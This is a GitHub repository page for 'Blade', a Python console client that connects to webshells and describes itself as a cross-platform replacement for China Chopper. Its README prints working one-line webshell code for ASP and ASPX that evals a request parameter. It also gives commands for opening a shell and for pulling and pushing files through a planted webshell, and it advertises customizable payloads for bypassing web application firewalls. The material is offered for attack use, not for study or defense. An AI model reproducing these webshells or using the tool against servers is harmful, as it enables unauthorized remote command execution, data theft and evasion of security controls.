Skip to content
/ Blade Public
forked from wonderqs/Blade

A webshell connection tool with customized WAF bypass payloads

License

Notifications You must be signed in to change notification settings

ssdtfarm/Blade

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

##Blade Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not. ##Major functions Manage a web server with only one-line code on it, just like:

PHP, ASP, ASPX & JSP supported.

Terminal Console provided.

File management & Dadabase management. ##Features Cross-plaform supported (Python needed)

Customizable WAF bypass payloads

Compatible with Chooper's server side scripts ##Server side scripts examples PHP:

ASP: <%eval request("cmd")%>

ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%> ##Usage Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd --shell

Download a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path

Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path ##Current issues Server side scripts supporting is not completed, currently only support PHP and ASP

Database management function is not completed, so can not connect databases ##Future developent Beacuse I am busy sometimes, the progress of development may be a bit slow. If anyone intrest this project, welcome fork!

About

A webshell connection tool with customized WAF bypass payloads

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%